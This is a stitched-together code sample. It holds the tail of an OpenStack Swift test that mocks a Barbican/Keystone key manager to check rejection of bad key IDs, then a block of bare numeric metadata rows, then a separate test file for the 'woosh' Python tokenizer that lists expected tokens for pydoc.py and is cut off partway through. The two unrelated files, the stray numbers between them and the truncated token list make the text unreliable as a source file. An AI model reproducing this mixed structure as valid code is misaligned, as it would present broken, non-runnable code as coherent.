'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_length(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_SHORT_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key format invalid')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_none_key(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_NONE_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though None key returned')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
if __name__ == '__main__':
unittest.main()
| 42.063776
| 79
| 0.668779
| 3,729
| 32,978
| 5.549209
| 0.083937
| 0.058474
| 0.052771
| 0.09003
| 0.804717
| 0.778476
| 0.757213
| 0.739235
| 0.734306
| 0.727782
| 0
| 0.007478
| 0.249803
| 32,978
| 783
| 80
| 42.117497
| 0.828941
| 0.03566
| 0
| 0.658228
| 0
| 0
| 0.205337
| 0.149479
| 0
| 0
| 0
| 0
| 0.018083
| 1
| 0.052441
| false
| 0.124774
| 0.018083
| 0.009042
| 0.092224
| 0.019892
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a2fbb305ec54cbefe2e9ebae01a8962af04f3660
| 1,007,795
|
py
|
Python
|
test/python/sample/stdlib/test_pydoc.py
|
esoma/woosh
|
4cd58eb93c69c48040ff1e25159e48def54c3111
|
[
"MIT"
] | null | null | null |
test/python/sample/stdlib/test_pydoc.py
|
esoma/woosh
|
4cd58eb93c69c48040ff1e25159e48def54c3111
|
[
"MIT"
] | null | null | null |
test/python/sample/stdlib/test_pydoc.py
|
esoma/woosh
|
4cd58eb93c69c48040ff1e25159e48def54c3111
|
[
"MIT"
] | null | null | null |
# this file was generated using test/python/sample/generate.py
# python
import io
import pathlib
# pytest
import pytest
# woosh
import woosh
def tokenize_file_like(source):
return list(woosh.tokenize(io.BytesIO(source)))
def tokenize_bytes(source):
return list(woosh.tokenize(source))
SAMPLE_DIR = pathlib.Path(__file__).parent.absolute() / '../../' / '../../' / 'sample'
@pytest.mark.parametrize('tokenize', [tokenize_file_like, tokenize_bytes])
def test(tokenize):
with open(SAMPLE_DIR / 'stdlib/pydoc.py', 'rb') as f:
tokens = tokenize(f.read())
for token, expected in zip(tokens, EXPECTED):
assert token == expected
EXPECTED = [
woosh.Token(woosh.ENCODING, 'utf-8', 1, 0, 1, 0),
woosh.Token(woosh.COMMENT, '#!/usr/bin/env python3', 1, 0, 1, 22),
woosh.Token(woosh.STRING, '"""Generate Python documentation in HTML or text for interactive use.\r\n\r\nAt the Python interactive prompt, calling help(thing) on a Python object\r\ndocuments the object, and calling help() starts up an interactive\r\nhelp session.\r\n\r\nOr, at the shell command line outside of Python:\r\n\r\nRun "pydoc <name>" to show documentation on something. <name> may be\r\nthe name of a function, module, package, or a dotted reference to a\r\nclass or function within a module or module in a package. If the\r\nargument contains a path segment delimiter (e.g. slash on Unix,\r\nbackslash on Windows) it is treated as the path to a Python source file.\r\n\r\nRun "pydoc -k <keyword>" to search for a keyword in the synopsis lines\r\nof all available modules.\r\n\r\nRun "pydoc -n <hostname>" to start an HTTP server with the given\r\nhostname (default: localhost) on the local machine.\r\n\r\nRun "pydoc -p <port>" to start an HTTP server on the given port on the\r\nlocal machine. Port number 0 can be used to get an arbitrary unused port.\r\n\r\nRun "pydoc -b" to start an HTTP server on an arbitrary unused port and\r\nopen a Web browser to interactively browse documentation. Combine with\r\nthe -n and -p options to control the hostname and port used.\r\n\r\nRun "pydoc -w <name>" to write out the HTML documentation for a module\r\nto a file named "<name>.html".\r\n\r\nModule docs for core modules are assumed to be in\r\n\r\n https://docs.python.org/X.Y/library/\r\n\r\nThis can be overridden by setting the PYTHONDOCS environment variable\r\nto a different URL or to a local directory containing the Library\r\nReference Manual pages.\r\n"""', 2, 0, 39, 3),
woosh.Token(woosh.NEWLINE, '\r\n', 39, 3, 40, 0),
woosh.Token(woosh.NAME, '__all__', 40, 0, 40, 7),
woosh.Token(woosh.OP, '=', 40, 8, 40, 9),
woosh.Token(woosh.OP, '[', 40, 10, 40, 11),
woosh.Token(woosh.STRING, "'help'", 40, 11, 40, 17),
woosh.Token(woosh.OP, ']', 40, 17, 40, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 40, 18, 41, 0),
woosh.Token(woosh.NAME, '__author__', 41, 0, 41, 10),
woosh.Token(woosh.OP, '=', 41, 11, 41, 12),
woosh.Token(woosh.STRING, '"Ka-Ping Yee <ping@lfw.org>"', 41, 13, 41, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 41, 41, 42, 0),
woosh.Token(woosh.NAME, '__date__', 42, 0, 42, 8),
woosh.Token(woosh.OP, '=', 42, 9, 42, 10),
woosh.Token(woosh.STRING, '"26 February 2001"', 42, 11, 42, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 42, 29, 43, 0),
woosh.Token(woosh.NAME, '__credits__', 44, 0, 44, 11),
woosh.Token(woosh.OP, '=', 44, 12, 44, 13),
woosh.Token(woosh.STRING, '"""Guido van Rossum, for an excellent programming language.\r\nTommy Burnette, the original creator of manpy.\r\nPaul Prescod, for all his work on onlinehelp.\r\nRichard Chamberlain, for the first implementation of textdoc.\r\n"""', 44, 14, 48, 3),
woosh.Token(woosh.NEWLINE, '\r\n', 48, 3, 49, 0),
woosh.Token(woosh.COMMENT, "# Known bugs that can't be fixed here:", 50, 0, 50, 38),
woosh.Token(woosh.COMMENT, '# - synopsis() cannot be prevented from clobbering existing', 51, 0, 51, 61),
woosh.Token(woosh.COMMENT, '# loaded modules.', 52, 0, 52, 21),
woosh.Token(woosh.COMMENT, '# - If the __file__ attribute on a module is a relative path and', 53, 0, 53, 66),
woosh.Token(woosh.COMMENT, '# the current directory is changed with os.chdir(), an incorrect', 54, 0, 54, 68),
woosh.Token(woosh.COMMENT, '# path will be displayed.', 55, 0, 55, 29),
woosh.Token(woosh.NAME, 'import', 57, 0, 57, 6),
woosh.Token(woosh.NAME, 'builtins', 57, 7, 57, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 57, 15, 58, 0),
woosh.Token(woosh.NAME, 'import', 58, 0, 58, 6),
woosh.Token(woosh.NAME, 'importlib', 58, 7, 58, 16),
woosh.Token(woosh.OP, '.', 58, 16, 58, 17),
woosh.Token(woosh.NAME, '_bootstrap', 58, 17, 58, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 58, 27, 59, 0),
woosh.Token(woosh.NAME, 'import', 59, 0, 59, 6),
woosh.Token(woosh.NAME, 'importlib', 59, 7, 59, 16),
woosh.Token(woosh.OP, '.', 59, 16, 59, 17),
woosh.Token(woosh.NAME, '_bootstrap_external', 59, 17, 59, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 59, 36, 60, 0),
woosh.Token(woosh.NAME, 'import', 60, 0, 60, 6),
woosh.Token(woosh.NAME, 'importlib', 60, 7, 60, 16),
woosh.Token(woosh.OP, '.', 60, 16, 60, 17),
woosh.Token(woosh.NAME, 'machinery', 60, 17, 60, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 60, 26, 61, 0),
woosh.Token(woosh.NAME, 'import', 61, 0, 61, 6),
woosh.Token(woosh.NAME, 'importlib', 61, 7, 61, 16),
woosh.Token(woosh.OP, '.', 61, 16, 61, 17),
woosh.Token(woosh.NAME, 'util', 61, 17, 61, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 61, 21, 62, 0),
woosh.Token(woosh.NAME, 'import', 62, 0, 62, 6),
woosh.Token(woosh.NAME, 'inspect', 62, 7, 62, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 62, 14, 63, 0),
woosh.Token(woosh.NAME, 'import', 63, 0, 63, 6),
woosh.Token(woosh.NAME, 'io', 63, 7, 63, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 63, 9, 64, 0),
woosh.Token(woosh.NAME, 'import', 64, 0, 64, 6),
woosh.Token(woosh.NAME, 'os', 64, 7, 64, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 64, 9, 65, 0),
woosh.Token(woosh.NAME, 'import', 65, 0, 65, 6),
woosh.Token(woosh.NAME, 'pkgutil', 65, 7, 65, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 65, 14, 66, 0),
woosh.Token(woosh.NAME, 'import', 66, 0, 66, 6),
woosh.Token(woosh.NAME, 'platform', 66, 7, 66, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 66, 15, 67, 0),
woosh.Token(woosh.NAME, 'import', 67, 0, 67, 6),
woosh.Token(woosh.NAME, 're', 67, 7, 67, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 67, 9, 68, 0),
woosh.Token(woosh.NAME, 'import', 68, 0, 68, 6),
woosh.Token(woosh.NAME, 'sys', 68, 7, 68, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 68, 10, 69, 0),
woosh.Token(woosh.NAME, 'import', 69, 0, 69, 6),
woosh.Token(woosh.NAME, 'sysconfig', 69, 7, 69, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 69, 16, 70, 0),
woosh.Token(woosh.NAME, 'import', 70, 0, 70, 6),
woosh.Token(woosh.NAME, 'time', 70, 7, 70, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 70, 11, 71, 0),
woosh.Token(woosh.NAME, 'import', 71, 0, 71, 6),
woosh.Token(woosh.NAME, 'tokenize', 71, 7, 71, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 71, 15, 72, 0),
woosh.Token(woosh.NAME, 'import', 72, 0, 72, 6),
woosh.Token(woosh.NAME, 'urllib', 72, 7, 72, 13),
woosh.Token(woosh.OP, '.', 72, 13, 72, 14),
woosh.Token(woosh.NAME, 'parse', 72, 14, 72, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 72, 19, 73, 0),
woosh.Token(woosh.NAME, 'import', 73, 0, 73, 6),
woosh.Token(woosh.NAME, 'warnings', 73, 7, 73, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 73, 15, 74, 0),
woosh.Token(woosh.NAME, 'from', 74, 0, 74, 4),
woosh.Token(woosh.NAME, 'collections', 74, 5, 74, 16),
woosh.Token(woosh.NAME, 'import', 74, 17, 74, 23),
woosh.Token(woosh.NAME, 'deque', 74, 24, 74, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 74, 29, 75, 0),
woosh.Token(woosh.NAME, 'from', 75, 0, 75, 4),
woosh.Token(woosh.NAME, 'reprlib', 75, 5, 75, 12),
woosh.Token(woosh.NAME, 'import', 75, 13, 75, 19),
woosh.Token(woosh.NAME, 'Repr', 75, 20, 75, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 75, 24, 76, 0),
woosh.Token(woosh.NAME, 'from', 76, 0, 76, 4),
woosh.Token(woosh.NAME, 'traceback', 76, 5, 76, 14),
woosh.Token(woosh.NAME, 'import', 76, 15, 76, 21),
woosh.Token(woosh.NAME, 'format_exception_only', 76, 22, 76, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 76, 43, 77, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------------------------- common routines', 79, 0, 79, 75),
woosh.Token(woosh.NAME, 'def', 81, 0, 81, 3),
woosh.Token(woosh.NAME, 'pathdirs', 81, 4, 81, 12),
woosh.Token(woosh.OP, '(', 81, 12, 81, 13),
woosh.Token(woosh.OP, ')', 81, 13, 81, 14),
woosh.Token(woosh.OP, ':', 81, 14, 81, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 81, 15, 82, 0),
woosh.Token(woosh.INDENT, ' ', 82, 0, 82, 4),
woosh.Token(woosh.STRING, '"""Convert sys.path into a list of absolute, existing, unique paths."""', 82, 4, 82, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 82, 75, 83, 0),
woosh.Token(woosh.NAME, 'dirs', 83, 4, 83, 8),
woosh.Token(woosh.OP, '=', 83, 9, 83, 10),
woosh.Token(woosh.OP, '[', 83, 11, 83, 12),
woosh.Token(woosh.OP, ']', 83, 12, 83, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 83, 13, 84, 0),
woosh.Token(woosh.NAME, 'normdirs', 84, 4, 84, 12),
woosh.Token(woosh.OP, '=', 84, 13, 84, 14),
woosh.Token(woosh.OP, '[', 84, 15, 84, 16),
woosh.Token(woosh.OP, ']', 84, 16, 84, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 84, 17, 85, 0),
woosh.Token(woosh.NAME, 'for', 85, 4, 85, 7),
woosh.Token(woosh.NAME, 'dir', 85, 8, 85, 11),
woosh.Token(woosh.NAME, 'in', 85, 12, 85, 14),
woosh.Token(woosh.NAME, 'sys', 85, 15, 85, 18),
woosh.Token(woosh.OP, '.', 85, 18, 85, 19),
woosh.Token(woosh.NAME, 'path', 85, 19, 85, 23),
woosh.Token(woosh.OP, ':', 85, 23, 85, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 85, 24, 86, 0),
woosh.Token(woosh.INDENT, ' ', 86, 0, 86, 8),
woosh.Token(woosh.NAME, 'dir', 86, 8, 86, 11),
woosh.Token(woosh.OP, '=', 86, 12, 86, 13),
woosh.Token(woosh.NAME, 'os', 86, 14, 86, 16),
woosh.Token(woosh.OP, '.', 86, 16, 86, 17),
woosh.Token(woosh.NAME, 'path', 86, 17, 86, 21),
woosh.Token(woosh.OP, '.', 86, 21, 86, 22),
woosh.Token(woosh.NAME, 'abspath', 86, 22, 86, 29),
woosh.Token(woosh.OP, '(', 86, 29, 86, 30),
woosh.Token(woosh.NAME, 'dir', 86, 30, 86, 33),
woosh.Token(woosh.NAME, 'or', 86, 34, 86, 36),
woosh.Token(woosh.STRING, "'.'", 86, 37, 86, 40),
woosh.Token(woosh.OP, ')', 86, 40, 86, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 86, 41, 87, 0),
woosh.Token(woosh.NAME, 'normdir', 87, 8, 87, 15),
woosh.Token(woosh.OP, '=', 87, 16, 87, 17),
woosh.Token(woosh.NAME, 'os', 87, 18, 87, 20),
woosh.Token(woosh.OP, '.', 87, 20, 87, 21),
woosh.Token(woosh.NAME, 'path', 87, 21, 87, 25),
woosh.Token(woosh.OP, '.', 87, 25, 87, 26),
woosh.Token(woosh.NAME, 'normcase', 87, 26, 87, 34),
woosh.Token(woosh.OP, '(', 87, 34, 87, 35),
woosh.Token(woosh.NAME, 'dir', 87, 35, 87, 38),
woosh.Token(woosh.OP, ')', 87, 38, 87, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 87, 39, 88, 0),
woosh.Token(woosh.NAME, 'if', 88, 8, 88, 10),
woosh.Token(woosh.NAME, 'normdir', 88, 11, 88, 18),
woosh.Token(woosh.NAME, 'not', 88, 19, 88, 22),
woosh.Token(woosh.NAME, 'in', 88, 23, 88, 25),
woosh.Token(woosh.NAME, 'normdirs', 88, 26, 88, 34),
woosh.Token(woosh.NAME, 'and', 88, 35, 88, 38),
woosh.Token(woosh.NAME, 'os', 88, 39, 88, 41),
woosh.Token(woosh.OP, '.', 88, 41, 88, 42),
woosh.Token(woosh.NAME, 'path', 88, 42, 88, 46),
woosh.Token(woosh.OP, '.', 88, 46, 88, 47),
woosh.Token(woosh.NAME, 'isdir', 88, 47, 88, 52),
woosh.Token(woosh.OP, '(', 88, 52, 88, 53),
woosh.Token(woosh.NAME, 'dir', 88, 53, 88, 56),
woosh.Token(woosh.OP, ')', 88, 56, 88, 57),
woosh.Token(woosh.OP, ':', 88, 57, 88, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 88, 58, 89, 0),
woosh.Token(woosh.INDENT, ' ', 89, 0, 89, 12),
woosh.Token(woosh.NAME, 'dirs', 89, 12, 89, 16),
woosh.Token(woosh.OP, '.', 89, 16, 89, 17),
woosh.Token(woosh.NAME, 'append', 89, 17, 89, 23),
woosh.Token(woosh.OP, '(', 89, 23, 89, 24),
woosh.Token(woosh.NAME, 'dir', 89, 24, 89, 27),
woosh.Token(woosh.OP, ')', 89, 27, 89, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 89, 28, 90, 0),
woosh.Token(woosh.NAME, 'normdirs', 90, 12, 90, 20),
woosh.Token(woosh.OP, '.', 90, 20, 90, 21),
woosh.Token(woosh.NAME, 'append', 90, 21, 90, 27),
woosh.Token(woosh.OP, '(', 90, 27, 90, 28),
woosh.Token(woosh.NAME, 'normdir', 90, 28, 90, 35),
woosh.Token(woosh.OP, ')', 90, 35, 90, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 90, 36, 91, 0),
woosh.Token(woosh.DEDENT, ' ', 91, 0, 91, 4),
woosh.Token(woosh.DEDENT, '', 91, 4, 91, 4),
woosh.Token(woosh.NAME, 'return', 91, 4, 91, 10),
woosh.Token(woosh.NAME, 'dirs', 91, 11, 91, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 91, 15, 92, 0),
woosh.Token(woosh.DEDENT, '', 93, 0, 93, 0),
woosh.Token(woosh.NAME, 'def', 93, 0, 93, 3),
woosh.Token(woosh.NAME, '_findclass', 93, 4, 93, 14),
woosh.Token(woosh.OP, '(', 93, 14, 93, 15),
woosh.Token(woosh.NAME, 'func', 93, 15, 93, 19),
woosh.Token(woosh.OP, ')', 93, 19, 93, 20),
woosh.Token(woosh.OP, ':', 93, 20, 93, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 93, 21, 94, 0),
woosh.Token(woosh.INDENT, ' ', 94, 0, 94, 4),
woosh.Token(woosh.NAME, 'cls', 94, 4, 94, 7),
woosh.Token(woosh.OP, '=', 94, 8, 94, 9),
woosh.Token(woosh.NAME, 'sys', 94, 10, 94, 13),
woosh.Token(woosh.OP, '.', 94, 13, 94, 14),
woosh.Token(woosh.NAME, 'modules', 94, 14, 94, 21),
woosh.Token(woosh.OP, '.', 94, 21, 94, 22),
woosh.Token(woosh.NAME, 'get', 94, 22, 94, 25),
woosh.Token(woosh.OP, '(', 94, 25, 94, 26),
woosh.Token(woosh.NAME, 'func', 94, 26, 94, 30),
woosh.Token(woosh.OP, '.', 94, 30, 94, 31),
woosh.Token(woosh.NAME, '__module__', 94, 31, 94, 41),
woosh.Token(woosh.OP, ')', 94, 41, 94, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 94, 42, 95, 0),
woosh.Token(woosh.NAME, 'if', 95, 4, 95, 6),
woosh.Token(woosh.NAME, 'cls', 95, 7, 95, 10),
woosh.Token(woosh.NAME, 'is', 95, 11, 95, 13),
woosh.Token(woosh.NAME, 'None', 95, 14, 95, 18),
woosh.Token(woosh.OP, ':', 95, 18, 95, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 95, 19, 96, 0),
woosh.Token(woosh.INDENT, ' ', 96, 0, 96, 8),
woosh.Token(woosh.NAME, 'return', 96, 8, 96, 14),
woosh.Token(woosh.NAME, 'None', 96, 15, 96, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 96, 19, 97, 0),
woosh.Token(woosh.DEDENT, ' ', 97, 0, 97, 4),
woosh.Token(woosh.NAME, 'for', 97, 4, 97, 7),
woosh.Token(woosh.NAME, 'name', 97, 8, 97, 12),
woosh.Token(woosh.NAME, 'in', 97, 13, 97, 15),
woosh.Token(woosh.NAME, 'func', 97, 16, 97, 20),
woosh.Token(woosh.OP, '.', 97, 20, 97, 21),
woosh.Token(woosh.NAME, '__qualname__', 97, 21, 97, 33),
woosh.Token(woosh.OP, '.', 97, 33, 97, 34),
woosh.Token(woosh.NAME, 'split', 97, 34, 97, 39),
woosh.Token(woosh.OP, '(', 97, 39, 97, 40),
woosh.Token(woosh.STRING, "'.'", 97, 40, 97, 43),
woosh.Token(woosh.OP, ')', 97, 43, 97, 44),
woosh.Token(woosh.OP, '[', 97, 44, 97, 45),
woosh.Token(woosh.OP, ':', 97, 45, 97, 46),
woosh.Token(woosh.OP, '-', 97, 46, 97, 47),
woosh.Token(woosh.NUMBER, '1', 97, 47, 97, 48),
woosh.Token(woosh.OP, ']', 97, 48, 97, 49),
woosh.Token(woosh.OP, ':', 97, 49, 97, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 97, 50, 98, 0),
woosh.Token(woosh.INDENT, ' ', 98, 0, 98, 8),
woosh.Token(woosh.NAME, 'cls', 98, 8, 98, 11),
woosh.Token(woosh.OP, '=', 98, 12, 98, 13),
woosh.Token(woosh.NAME, 'getattr', 98, 14, 98, 21),
woosh.Token(woosh.OP, '(', 98, 21, 98, 22),
woosh.Token(woosh.NAME, 'cls', 98, 22, 98, 25),
woosh.Token(woosh.OP, ',', 98, 25, 98, 26),
woosh.Token(woosh.NAME, 'name', 98, 27, 98, 31),
woosh.Token(woosh.OP, ')', 98, 31, 98, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 98, 32, 99, 0),
woosh.Token(woosh.DEDENT, ' ', 99, 0, 99, 4),
woosh.Token(woosh.NAME, 'if', 99, 4, 99, 6),
woosh.Token(woosh.NAME, 'not', 99, 7, 99, 10),
woosh.Token(woosh.NAME, 'inspect', 99, 11, 99, 18),
woosh.Token(woosh.OP, '.', 99, 18, 99, 19),
woosh.Token(woosh.NAME, 'isclass', 99, 19, 99, 26),
woosh.Token(woosh.OP, '(', 99, 26, 99, 27),
woosh.Token(woosh.NAME, 'cls', 99, 27, 99, 30),
woosh.Token(woosh.OP, ')', 99, 30, 99, 31),
woosh.Token(woosh.OP, ':', 99, 31, 99, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 99, 32, 100, 0),
woosh.Token(woosh.INDENT, ' ', 100, 0, 100, 8),
woosh.Token(woosh.NAME, 'return', 100, 8, 100, 14),
woosh.Token(woosh.NAME, 'None', 100, 15, 100, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 100, 19, 101, 0),
woosh.Token(woosh.DEDENT, ' ', 101, 0, 101, 4),
woosh.Token(woosh.NAME, 'return', 101, 4, 101, 10),
woosh.Token(woosh.NAME, 'cls', 101, 11, 101, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 101, 14, 102, 0),
woosh.Token(woosh.DEDENT, '', 103, 0, 103, 0),
woosh.Token(woosh.NAME, 'def', 103, 0, 103, 3),
woosh.Token(woosh.NAME, '_finddoc', 103, 4, 103, 12),
woosh.Token(woosh.OP, '(', 103, 12, 103, 13),
woosh.Token(woosh.NAME, 'obj', 103, 13, 103, 16),
woosh.Token(woosh.OP, ')', 103, 16, 103, 17),
woosh.Token(woosh.OP, ':', 103, 17, 103, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 103, 18, 104, 0),
woosh.Token(woosh.INDENT, ' ', 104, 0, 104, 4),
woosh.Token(woosh.NAME, 'if', 104, 4, 104, 6),
woosh.Token(woosh.NAME, 'inspect', 104, 7, 104, 14),
woosh.Token(woosh.OP, '.', 104, 14, 104, 15),
woosh.Token(woosh.NAME, 'ismethod', 104, 15, 104, 23),
woosh.Token(woosh.OP, '(', 104, 23, 104, 24),
woosh.Token(woosh.NAME, 'obj', 104, 24, 104, 27),
woosh.Token(woosh.OP, ')', 104, 27, 104, 28),
woosh.Token(woosh.OP, ':', 104, 28, 104, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 104, 29, 105, 0),
woosh.Token(woosh.INDENT, ' ', 105, 0, 105, 8),
woosh.Token(woosh.NAME, 'name', 105, 8, 105, 12),
woosh.Token(woosh.OP, '=', 105, 13, 105, 14),
woosh.Token(woosh.NAME, 'obj', 105, 15, 105, 18),
woosh.Token(woosh.OP, '.', 105, 18, 105, 19),
woosh.Token(woosh.NAME, '__func__', 105, 19, 105, 27),
woosh.Token(woosh.OP, '.', 105, 27, 105, 28),
woosh.Token(woosh.NAME, '__name__', 105, 28, 105, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 105, 36, 106, 0),
woosh.Token(woosh.NAME, 'self', 106, 8, 106, 12),
woosh.Token(woosh.OP, '=', 106, 13, 106, 14),
woosh.Token(woosh.NAME, 'obj', 106, 15, 106, 18),
woosh.Token(woosh.OP, '.', 106, 18, 106, 19),
woosh.Token(woosh.NAME, '__self__', 106, 19, 106, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 106, 27, 107, 0),
woosh.Token(woosh.NAME, 'if', 107, 8, 107, 10),
woosh.Token(woosh.OP, '(', 107, 11, 107, 12),
woosh.Token(woosh.NAME, 'inspect', 107, 12, 107, 19),
woosh.Token(woosh.OP, '.', 107, 19, 107, 20),
woosh.Token(woosh.NAME, 'isclass', 107, 20, 107, 27),
woosh.Token(woosh.OP, '(', 107, 27, 107, 28),
woosh.Token(woosh.NAME, 'self', 107, 28, 107, 32),
woosh.Token(woosh.OP, ')', 107, 32, 107, 33),
woosh.Token(woosh.NAME, 'and', 107, 34, 107, 37),
woosh.Token(woosh.NAME, 'getattr', 108, 12, 108, 19),
woosh.Token(woosh.OP, '(', 108, 19, 108, 20),
woosh.Token(woosh.NAME, 'getattr', 108, 20, 108, 27),
woosh.Token(woosh.OP, '(', 108, 27, 108, 28),
woosh.Token(woosh.NAME, 'self', 108, 28, 108, 32),
woosh.Token(woosh.OP, ',', 108, 32, 108, 33),
woosh.Token(woosh.NAME, 'name', 108, 34, 108, 38),
woosh.Token(woosh.OP, ',', 108, 38, 108, 39),
woosh.Token(woosh.NAME, 'None', 108, 40, 108, 44),
woosh.Token(woosh.OP, ')', 108, 44, 108, 45),
woosh.Token(woosh.OP, ',', 108, 45, 108, 46),
woosh.Token(woosh.STRING, "'__func__'", 108, 47, 108, 57),
woosh.Token(woosh.OP, ')', 108, 57, 108, 58),
woosh.Token(woosh.NAME, 'is', 108, 59, 108, 61),
woosh.Token(woosh.NAME, 'obj', 108, 62, 108, 65),
woosh.Token(woosh.OP, '.', 108, 65, 108, 66),
woosh.Token(woosh.NAME, '__func__', 108, 66, 108, 74),
woosh.Token(woosh.OP, ')', 108, 74, 108, 75),
woosh.Token(woosh.OP, ':', 108, 75, 108, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 108, 76, 109, 0),
woosh.Token(woosh.COMMENT, '# classmethod', 109, 12, 109, 25),
woosh.Token(woosh.INDENT, ' ', 110, 0, 110, 12),
woosh.Token(woosh.NAME, 'cls', 110, 12, 110, 15),
woosh.Token(woosh.OP, '=', 110, 16, 110, 17),
woosh.Token(woosh.NAME, 'self', 110, 18, 110, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 110, 22, 111, 0),
woosh.Token(woosh.DEDENT, ' ', 111, 0, 111, 8),
woosh.Token(woosh.NAME, 'else', 111, 8, 111, 12),
woosh.Token(woosh.OP, ':', 111, 12, 111, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 111, 13, 112, 0),
woosh.Token(woosh.INDENT, ' ', 112, 0, 112, 12),
woosh.Token(woosh.NAME, 'cls', 112, 12, 112, 15),
woosh.Token(woosh.OP, '=', 112, 16, 112, 17),
woosh.Token(woosh.NAME, 'self', 112, 18, 112, 22),
woosh.Token(woosh.OP, '.', 112, 22, 112, 23),
woosh.Token(woosh.NAME, '__class__', 112, 23, 112, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 112, 32, 113, 0),
woosh.Token(woosh.DEDENT, ' ', 113, 0, 113, 4),
woosh.Token(woosh.DEDENT, '', 113, 4, 113, 4),
woosh.Token(woosh.NAME, 'elif', 113, 4, 113, 8),
woosh.Token(woosh.NAME, 'inspect', 113, 9, 113, 16),
woosh.Token(woosh.OP, '.', 113, 16, 113, 17),
woosh.Token(woosh.NAME, 'isfunction', 113, 17, 113, 27),
